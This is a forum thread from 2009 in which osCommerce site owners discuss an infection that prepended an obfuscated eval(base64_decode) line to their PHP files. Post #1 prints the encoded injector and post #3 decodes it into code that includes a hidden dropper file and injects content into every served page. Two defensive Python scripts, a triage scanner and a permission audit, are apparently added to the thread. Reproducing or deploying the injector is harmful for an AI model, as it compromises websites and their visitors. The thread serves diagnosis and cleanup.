Did Someone hack my site ? ( Eval Base64 Decode )


154 replies to this topic

#1   Weedwaka
  • Members
  • 51 posts
  • Real Name:David

Posted 05 September 2009 - 12:38 PM

I was doing some updating on my site and I noticed some strange code appearing at the top of all of my php files.

What is this? I sure as hell did not put it there. Should I erase it all?

Can I tell when it was added?

<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10p
KXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9pc
HcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdlcy
9idXR0b25zL3N0eWxlLmNzcy5waHAnKSl7aW5jbHVkZV9vbmNlKCcvaG9tZS91c2Vycy93ZWIvYjk2OS9
pcHcuYWN0aXZlL3B1YmxpY19odG1sL2FkbWluL2luY2x1ZGVzL2xhbmd1YWdlcy9lbmdsaXNoL2ltYWdl
cy9idXR0b25zL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbCcpJiYhZnVuY3Rpb
25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbi
BnemRlY29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzM
wODdBMzNFNEQzQTQ5N0JEODZCPW9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjcz
Mjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBM
jA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEOD
ZCJjQpeyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9dW5wYWNrKCd2JyxzdWJzdHIoJFI
yMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwxMCwyKSk7JFIwRDU0MjM2REEyMDU5NEVDMTNG
QzgxQjIwOTczMzkzMT0kUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxWzFdOyRSNjAxNjlDR
DFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTIrJFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMz
kzMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY4KXskUjYwMTY5Q0QxQzQ3Qjd
BN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4
LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENER
ThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RT
QxPXN0cnBvcygkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0Q
xQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSsxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5
N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDErPTI7fSRSQzRBNUI1RTMxM
EVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRkQ2NUU5Qzc0MDYwMzRGQU
RDNjgyRjA2NzMyODY4LCRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVFNDEpKTtpZigkUkM0QTV
CNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPT09RkFMU0UpeyRSQzRBNUI1RTMxMEVENEMzMjNFMDRE
NzJBRkFFMzlGNTM9JFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2ODt9cmV0dXJuICRSQzRBN
UI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM7fX1mdW5jdGlvbiBkZ29iaCgkUkRBM0U2MTQxNEU1ME
FFRTk2ODEzMkYwM0QyNjVFMENGKXtIZWFkZXIoJ0NvbnRlbnQtRW5jb2Rpbmc6IG5vbmUnKTskUjNFMzN
FMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwPWd6ZGVjb2RlKCRSREEzRTYxNDE0RTUwQUVFOTY4MTMy
RjAzRDI2NUUwQ0YpO2lmKHByZWdfbWF0Y2goJy9cPGJvZHkvc2knLCRSM0UzM0UwMTdDRDc2QjlCN0U2Q
zczNjRGQjkxRTJFOTApKXtyZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8Ym9keVteXD5dKlw+KS9zaScsJy
QxJy5nbWwoKSwkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKTt9ZWxzZXtyZXR1cm4gZ21
sKCkuJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MDt9fW9iX3N0YXJ0KCdkZ29iaCcpO319
fQ==')); ?>

#2   germ
  • Members
  • 13,921 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 05 September 2009 - 12:58 PM

click this
If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."
- Me -

"Headers already sent" - The definitive help

"Cannot redeclare ..." - How to find/fix it

SSL Implementation Help

Like this post? "Like" it again over there >

#3   germ
  • Members
  • 13,921 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 05 September 2009 - 01:30 PM

I decoded it and it tells you where one of the hacker's files is:

Quote

if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;if(file_exists('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php')){include_once('/home/users/web/b969/ipw.active/public_html/admin/includes/languages/english/images/buttons/style.css.php');if(function_exists('gml')&&!function_exists('dgobh')){if(!function_exists('gzdecode')){function gzdecode($R20FD65E9C7406034FADC682F06732868){$R6B6E98CDE8B33087A33E4D3A497BD86B=ord(substr($R20FD65E9C7406034FADC682F06732868,3,1));$R60169CD1C47B7A7A85AB44F884635E41=10;$R0D54236DA20594EC13FC81B209733931=0;if($R6B6E98CDE8B33087A33E4D3A497BD86B&4){$R0D54236DA20594EC13FC81B209733931=unpack('v',substr($R20FD65E9C7406034FADC682F06732868,10,2));$R0D54236DA20594EC13FC81B209733931=$R0D54236DA20594EC13FC81B209733931[1];$R60169CD1C47B7A7A85AB44F884635E41+=2+$R0D54236DA20594EC13FC81B209733931;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&8){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&16){$R60169CD1C47B7A7A85AB44F884635E41=strpos($R20FD65E9C7406034FADC682F06732868,chr(0),$R60169CD1C47B7A7A85AB44F884635E41)+1;}if($R6B6E98CDE8B33087A33E4D3A497BD86B&2){$R60169CD1C47B7A7A85AB44F884635E41+=2;}$RC4A5B5E310ED4C323E04D72AFAE39F53=gzinflate(substr($R20FD65E9C7406034FADC682F06732868,$R60169CD1C47B7A7A85AB44F884635E41));if($RC4A5B5E310ED4C323E04D72AFAE39F53===FALSE){$RC4A5B5E310ED4C323E04D72AFAE39F53=$R20FD65E9C7406034FADC682F06732868;}return $RC4A5B5E310ED4C323E04D72AFAE39F53;}}function dgobh($RDA3E61414E50AEE968132F03D265E0CF){Header('Content-Encoding: none');$R3E33E017CD76B9B7E6C7364FB91E2E90=gzdecode($RDA3E61414E50AEE968132F03D265E0CF);if(preg_match('/\<body/si',$R3E33E017CD76B9B7E6C7364FB91E2E90)){return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$R3E33E017CD76B9B7E6C7364FB91E2E90);}else{return 
gml().$R3E33E017CD76B9B7E6C7364FB91E2E90;}}ob_start('dgobh');}}}

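germ's decode shows the mechanism: if the dropped style.css.php exists it is included, and ob_start('dgobh') registers an output-buffer callback that gunzips the page if necessary and inserts whatever gml() returns right after the <body> tag of every page the infected file serves. The script below is an added example for this thread (not code from the posts or from osCommerce) that triages such files without executing anything: it finds the prepended eval(base64_decode('...')) line across a tree, decodes it with base64 only, lists the paths and ob_start callbacks the payload references, groups infected files by modification minute (the "same time stamp" observation in post #8) and can strip the prefix. The sample file at the bottom is constructed, modelled on germ's decode and using the dropper path from post #3; the regular expressions assume the prefix has exactly the shape shown in post #1.

```python
"""Static triage for the eval(base64_decode(...)) prefix seen in this thread.
Added example, not code from the original posts or from osCommerce.
The payload is decoded with base64 only (never eval), so this is safe to run
directly on infected files."""
import base64
import os
import re
import time
from collections import defaultdict

# The prefix from post #1: "<?php /**/eval(base64_decode('...')); ?>".
# The quoted payload may be wrapped over several lines, so whitespace is allowed inside it.
INJECT_RE = re.compile(
    r"<\?php\s*(?:/\*.*?\*/)?\s*eval\s*\(\s*base64_decode\s*\("
    r"\s*'([A-Za-z0-9+/=\s]+)'\s*\)\s*\)\s*;\s*\?>\s*",
    re.S,
)
# Files the decoded payload tests for or pulls in (the dropped style.css.php in germ's decode).
PATH_RE = re.compile(
    r"(?:file_exists|include_once|include|require_once|require)\s*\(\s*'([^']+)'"
)
# Output-buffer callback the payload registers (dgobh in germ's decode).
OB_RE = re.compile(r"ob_start\s*\(\s*'([^']+)'\s*\)")


def decode_payload(b64: str) -> str:
    """Decode the base64 text statically; PHP's base64_decode ignores the line breaks too."""
    return base64.b64decode(re.sub(r"\s+", "", b64)).decode("utf-8", "replace")


def analyse_source(src: str):
    """Return None for a clean file, otherwise a summary of the injected prefix."""
    m = INJECT_RE.search(src)
    if m is None:
        return None
    decoded = decode_payload(m.group(1))
    return {
        "offset": m.start(),  # 0 means it was prepended, as in the thread
        "decoded": decoded,
        "paths": sorted(set(PATH_RE.findall(decoded))),
        "ob_callbacks": OB_RE.findall(decoded),
    }


def clean_source(src: str) -> str:
    """Return src with the injected prefix stripped; the caller decides whether to write it back."""
    return INJECT_RE.sub("", src, count=1)


def scan_tree(root: str):
    """Walk root and return (path, mtime, summary) for every .php file carrying the prefix."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="replace") as fh:
                    head = fh.read(65536)  # the prefix sits at the very top of the file
            except OSError:
                continue
            summary = analyse_source(head)
            if summary is not None:
                hits.append((full, os.stat(full).st_mtime, summary))
    return hits


def group_by_minute(hits):
    """Bucket hits by modification minute (UTC); a mass rewrite like the one
    in post #8 shows up as a single large bucket."""
    buckets = defaultdict(list)
    for path, mtime, _summary in hits:
        buckets[time.strftime("%Y-%m-%d %H:%M", time.gmtime(mtime))].append(path)
    return dict(buckets)


# --- constructed sample, modelled on germ's decode in post #3 (not the real payload) ---
DROPPER_PATH = ("/home/users/web/b969/ipw.active/public_html/admin/includes/"
                "languages/english/images/buttons/style.css.php")
_INNER = (
    "if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){$GLOBALS['sh_no']=1;"
    f"if(file_exists('{DROPPER_PATH}')){{include_once('{DROPPER_PATH}');ob_start('dgobh');}}}}"
)
_B64 = base64.b64encode(_INNER.encode()).decode()
ORIGINAL_SOURCE = "<?php\n// constructed original file\necho 'hello';\n"
SAMPLE_INFECTED = (
    "<?php /**/eval(base64_decode('"
    + "\n".join(_B64[i:i + 76] for i in range(0, len(_B64), 76))
    + "')); ?>\n" + ORIGINAL_SOURCE
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python3 triage.py /path/to/public_html
        hits = scan_tree(sys.argv[1])
        for minute, paths in group_by_minute(hits).items():
            print(f"{minute}: {len(paths)} infected file(s)")
        for path, _mtime, s in hits:
            print(path, "->", s["paths"], s["ob_callbacks"])
    else:  # demo on the constructed sample
        print(analyse_source(SAMPLE_INFECTED))
```

Run it against a copy of the account (python3 triage.py /path/to/public_html) before editing anything. The prefix is only the loader: the paths it reports are the files to look at next, and clean_source() output should be written back only after those dropped files, and anything they in turn include, are gone, because as FIMBLE notes every php file on the account has to be checked, including ones with misleading names such as style.css.php.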

#4   FIMBLE
  • Community Sponsor
  • 6,576 posts
  • Real Name:Nic
  • Gender:Male

Posted 05 September 2009 - 01:44 PM

I found a very similar script in admin / fckeditor / editor / filemanager / browser / default / images / icons / 32 / sytle.css.php
in someone's site last week, another good reason why people need to increase security, at the very least change the admin folder name.

Sometimes you're the dog and sometimes the lamp post

My Contributions

#5   Weedwaka
  • Members
  • 51 posts
  • Real Name:David

Posted 07 September 2009 - 06:07 PM

Thanks for the replies.

You were correct on the file being the hacker's. I deleted it and cleaned the other files, however now I am having some problems.

I can't log into my admin at all. Nothing comes up.

I am getting the old permissions warning on the includes/configure.php file, which is set to 444, and I can't figure out why. Aaarg!!!

Why are people such douche bags??

Any help with these problems would be greatly appreciated.

#6   FIMBLE
  • Community Sponsor
  • 6,576 posts
  • Real Name:Nic
  • Gender:Male

Posted 07 September 2009 - 06:14 PM

This kind of hack usually writes to EVERY php file on your account; you will need to make sure that they all are clean.
I expect that your host has error reporting off, so you will need to view your server error logs or read this article
click me to get the code to add

#7   Weedwaka
  • Members
  • 51 posts
  • Real Name:David

Posted 07 September 2009 - 06:15 PM

If anybody wants the information from that file, I can email it. It is too long to post.

#8   blueflametuna
  • Members
  • 40 posts
  • Real Name:Jim
  • Gender:Male
  • Location:Idaho

Posted 07 September 2009 - 06:46 PM

Yup, me too!  Same identical signature.

Almost every php file within the osCommerce hierarchy.  /admin, /catalog.

All with the same time stamp of Sep 04 2009 07:36 PST.
This is an automated hack.  It finds you, embeds itself, and spreads itself around.

This appears very similar to one I saw last year.

I contacted my hosting provider, and they said there was nothing they could or would do.
"Try osCommerce.  It's their code vulnerabilities.  Fix the scripts."

This is one of the reasons I went through the trouble of moving to a new hosting service,
and upgrading to the v2.2 RC2a.
The previous version had some security issues.

Apparently, so does this one.
I am about done with trying to clean up my site on a weekly basis.
Only to have this garbage re-infecting my site again and again.

#9   Weedwaka
  • Members
  • 51 posts
  • Real Name:David

Posted 07 September 2009 - 06:47 PM

What is the purpose of this code ?

#10   blueflametuna
  • Members
  • 40 posts
  • Real Name:Jim
  • Gender:Male
  • Location:Idaho

Posted 07 September 2009 - 07:06 PM

I haven't followed all of the logic in this one, but if it is similar to the hack from last year,
it embeds the eval stuff at the front of every php file, which then runs more scripts that have been buried
deeper within your file system.

I found these in /admin/includes/languages/english/modules/index

cnf
csi
customers.php
dg.php
lock
orders.php
s.php
skwd
style.css.php
style.css.php.orig
swf

Only two of which are my original files: customers.php and orders.php.

cnf:                ASCII text
csi:                ASCII text
dg.php:             PHP script text
lock:               empty
s.php:              PHP script text
skwd:               ASCII text, with CRLF line terminators
style.css.php:      PHP script text
style.css.php.orig: PHP script text
swf:                Macromedia Flash data (compressed), version 9

csi has an IP address and a UNIX time stamp.
The IP address resolves to some tpnet.pl, a dialup service in Warsaw, Poland.

The file skwd is a list of random search words:

tramadol
blackjack
craps
onlinecasino
propecia
pokerstars
fulltiltpoker
gambling
casino
casinos
alprazolam
soma
ambien
cialis
ultram
viagra
fioricet
xanax
fiericet
slot
baccarat
carisoprodol
keno
muscle
valium
deposit
deposits
levitra
zoloft
acomplia
acyclovir
betting
realtytrac
intercasino
zithromax
diazepam
sildenafil
tadalafil
valtrex

No doubt to be used by Google and other search engines to be linked back to your site,
at locations that have nothing to do with your ecommerce content.

Last time, it was some porno sites in China and Russia.

And visitors to your site will now be the happy beneficiaries of virii.
I received threats from people saying that I was a porno spammer.  Sheesh.


But this variation is much more sophisticated.
The prior version was not nearly as prolific, or buried as deep.

I am still faced with the prospect of re-uploading my entire site contents,
and resetting all of the directory and file permissions.  Hours and hours.

And without some reassurance that the vulnerabilities will be fixed in the next six months,
I am forced to make the decision to either check the site daily, or to find a new ecommerce solution.

#11   Tbench
  • Members
  • 35 posts
  • Real Name:Terry Brown

Posted 07 September 2009 - 07:58 PM

It got me as well on two sites.

Siteground want $50 to fix it or $150 for a 99.9% solution.

What I cannot fathom is what they get out of it!!

#12   blueflametuna
  • Members
  • 40 posts
  • Real Name:Jim
  • Gender:Male
  • Location:Idaho

Posted 07 September 2009 - 09:25 PM

The hackers get tons of traffic sent to their sites via your server.
It is virtually untraceable.  And self replicating.  This thing could have been sent out months ago.
As it finds more sites that support php (osCommerce, specifically), it knows precise vulnerabilities.

It is our job to figure out how, and to block yet another hole.

But don't expect your service provider's tech support to offer you anything more than README files,
and a more expensive solution.

That's exactly what I want to do with my next two weeks: Start all over again with yet another eCommerce package,
customizing the cosmetics, developing a new database of products, and finding another hosting company.  Oh joy.

#13   Giovanna
  • Members
  • 161 posts
  • Real Name:Giovanna
  • Gender:Female
  • Location:Manchester, UK

Posted 07 September 2009 - 09:54 PM

Why do all that when you can follow the instructions on how to secure your site in the tips and tricks section? Your host cannot help if you don't make sure your installation is protected.
Main thing is to rename your admin and protect it via your host panel. Read the tips and tricks section; it is full of information on how to protect yourself and your customers.

#14   Giovanna
  • Members
  • 161 posts
  • Real Name:Giovanna
  • Gender:Female
  • Location:Manchester, UK

Posted 07 September 2009 - 09:55 PM

http://forums.oscommerce.com/index.php?showtopic=313323
The direct link to the secure your site info.

#15   germ
  • Members
  • 13,921 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 07 September 2009 - 11:18 PM

blueflametuna, on Sep 7 2009, 01:46 PM, said:

Yup, me too!  Same identical signature.

Almost every php file within the osCommerce hierarchy.  /admin, /catalog.

All with the same time stamp of Sep 04 2009 07:36 PST.
This is an automated hack.  It finds you, embeds itself, and spreads itself around.

This appears very similar to one I saw last year.

I contacted my hosting provider, and they said there was nothing they could or would do.
"Try osCommerce.  It's their code vulnerabilities.  Fix the scripts."

This is one of the reasons I went through the trouble of moving to a new hosting service,
and upgrading to the v2.2 RC2a.
The previous version had some security issues.

Apparently, so does this one.
I am about done with trying to clean up my site on a weekly basis.
Only to have this garbage re-infecting my site again and again.

I'd have to disagree.

It's been my observation that more often than not it's usually because of the way the site is setup and NOT the software behind it.

The site I manage isn't even running the latest V2 of osC and in the 2+ years we've been on the net we've only had two minor "bumps in the road".

My observation has been that over 90% of the sites that get hacked are because they have a folder (/images or /catalog/images or /admin/backups usually) set with 777 permissions.

It is an undeniable truth that if you have a FOLDER with 777 permissions, because of the way most servers are set up, it's usually only matter of time before you get hacked.

Not IF, just WHEN and HOW BAD.

Folder permissions should NEVER be higher than 755 - EVER.

These hackers can even get behind the .htaccess file "protecting" the admin if there is a folder back there with 777 permissions. I've seen it happen.

Edited by germ, 07 September 2009 - 11:19 PM.

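germ's rule (no folder above 755) and the ceiling blueflametuna mentions in the next post (files mostly at 644) can be checked with one audit over the web root. The script below is an added example for this thread, not osCommerce code: it walks a directory, flags everything that is group- or world-writable, reports any remaining bits beyond 755 for directories and 644 for files, and notes setuid/setgid. The SAMPLE_ENTRIES list is constructed (the folder names are the ones germ lists, the 444 configure.php is from post #5 and dg.php is one of the dropped files from post #10); the modes on them are invented for the demonstration.

```python
"""Permission audit for a web root: the 777-folder check germ describes in post #15,
with the 755/644 ceilings the thread mentions.  Added example for this thread,
not osCommerce code."""
import os
import stat

DIR_LIMIT = 0o755    # post #15: folder permissions never higher than 755
FILE_LIMIT = 0o644   # post #16: files mostly at 644


def mode_problems(mode: int, is_dir: bool) -> list:
    """Explain why a mode is too loose; an empty list means it is within the limits."""
    bits = stat.S_IMODE(mode)
    problems = []
    if bits & stat.S_IWOTH:
        problems.append("world-writable")
    if bits & stat.S_IWGRP:
        problems.append("group-writable")
    limit = DIR_LIMIT if is_dir else FILE_LIMIT
    # Anything set beyond the ceiling that was not already reported as a write bit.
    extra = bits & ~limit & ~(stat.S_IWOTH | stat.S_IWGRP)
    if extra:
        problems.append(f"bits beyond {limit:o}: {extra:03o}")
    if bits & (stat.S_ISUID | stat.S_ISGID):
        problems.append("setuid/setgid")
    return problems


def audit_entries(entries):
    """entries: iterable of (path, st_mode, is_dir).  Returns (path, 'octal', problems)
    for every entry that breaks the limits, in input order."""
    findings = []
    for path, mode, is_dir in entries:
        problems = mode_problems(mode, is_dir)
        if problems:
            findings.append((path, f"{stat.S_IMODE(mode):03o}", problems))
    return findings


def walk_entries(root: str):
    """Yield (path, st_mode, is_dir) for root and everything under it, skipping symlinks
    (their own mode bits mean nothing and following them could leave the web root)."""
    st = os.lstat(root)
    yield root, st.st_mode, stat.S_ISDIR(st.st_mode)
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)
            except OSError:
                continue
            if stat.S_ISLNK(st.st_mode):
                continue
            yield full, st.st_mode, stat.S_ISDIR(st.st_mode)


def audit_tree(root: str):
    """Audit a real directory; same output shape as audit_entries()."""
    return audit_entries(walk_entries(root))


# Constructed entries: folder names from post #15, configure.php at 444 from post #5,
# dg.php from the list in post #10.  The modes are invented for the demo.
SAMPLE_ENTRIES = [
    ("/site/images", 0o040777, True),
    ("/site/catalog", 0o040755, True),
    ("/site/admin/backups", 0o040775, True),
    ("/site/includes/configure.php", 0o100444, False),
    ("/site/index.php", 0o100644, False),
    ("/site/admin/includes/languages/english/modules/index/dg.php", 0o100755, False),
]

if __name__ == "__main__":
    import sys
    findings = audit_tree(sys.argv[1]) if len(sys.argv) > 1 else audit_entries(SAMPLE_ENTRIES)
    for path, octal, problems in findings:
        print(f"{octal} {path}: {', '.join(problems)}")
```

A clean report only rules out the 777 case germ describes. It says nothing about the situation blueflametuna describes in the next post, where the web server runs as the file owner and can rewrite anything the owner can, so the audit complements the server-log review germ asks for in post #19 rather than replacing it.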

#16   blueflametuna
  • Members
  • 40 posts
  • Real Name:Jim
  • Gender:Male
  • Location:Idaho

Posted 07 September 2009 - 11:50 PM

Thank you for your observation.  But there are no folders or files with permissions higher than 755.  Most are 644.
There are absolutely no files or folders now, or in the past that were ever set to 777.  This was the first thing I checked then,
and is something I have just verified again now.

Yours is an easy and obvious suggestion, but not valid in this case.  The files are owned by my account, and the server runs with my ownership permissions.  The software is permitting the server to overwrite my own files in place, then executing them.  It does not need "other" write permissions if it can run as the "owner".

I submit that there ARE vulnerabilities in the code, and that even with "best practices" and a secure server,
these hackers are able to circumvent this and do their evil.

They are not logging in, they are not using FTP.  These are self-modifying scripting tactics, through some form of an input validation bypass, or form processing technique.

#17   germ
  • Members
  • 13,921 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 08 September 2009 - 12:04 AM

Then you are among the minority.

Security is only as strong as the weakest link.

There are a lot of relatively new FTP viruses that can infect your PC, and thru that gain access to your site.

If your PC is compromised (and most people can't tell) then your site may be as well.

And just because you have an up-to-date antivirus running doesn't necessarily mean your PC is "clean".

I used to do a lot of help/posting on an anti-virus/anti malware removal site.

Most everyone that had a virus I saw also had an up-to-date antivirus running. I never could figure that one out.

There are a few contributions that have known security issues that I have seen.

And there might be unknown flaws in the base code.

I'm not saying it's immune. I really don't know.

My experience is that it's the inexperience of most site owners/operators that leads to problems like this more times than not.

#18   blueflametuna
  • Members
  • 40 posts
  • Real Name:Jim
  • Gender:Male
  • Location:Idaho

Posted 08 September 2009 - 01:00 AM

Like I said, they did not login, and they did not use FTP to "upload" new files.
The files were edited in place by prepending the one line <?php eval(base64_decode ... to nearly 1,000 files at once.

This has nothing to do with a virus on my PC.

It has only to do with a vulnerability within the osCommerce software that they are able to take advantage of.

In the previous version, they used global variables.  I upgraded to rc2a so that it would no longer use them.
Now there is something new, but I suspect, very similar in its design.

Unfortunately, I do not have archives of the access logs, so I cannot prove it, nor enough real-time data to pursue a forensics investigation.

I am not a newbie.  (Or is it NOOB these days?)  I do not even attempt to keep up with the current vernacular,
or local colloquialisms of new age netiquette.   But I can still find my way around a keyboard, and navigate through
thousands of lines of code, if need be.  It is just frustrating that I should need to.  It's a shopping cart app.

#19   germ
  • Members
  • 13,921 posts
  • Real Name:Jim
  • Gender:Male
  • Location:USA (GMT-6)

Posted 08 September 2009 - 03:35 AM

And until you have access to the server logs, and can prove someone was in a particular osC file with a particular URL and did such-and-such (SQL injection or whatever), the real cause is still unknown.

Any "finger pointing" at this point in time is mere conjecture.

I've only had two minor "blurps" in two and a half years, and they were my fault.

It seems to work for the site I manage so I'm staying.

#20   Weedwaka
  • Members
  • 51 posts
  • Real Name:David

Posted 08 September 2009 - 04:36 AM

I am very much a newbie at php. I probably did leave a door open somewhere for this weenie to get in.

I am still trying to get my site back up and running because of this crap =/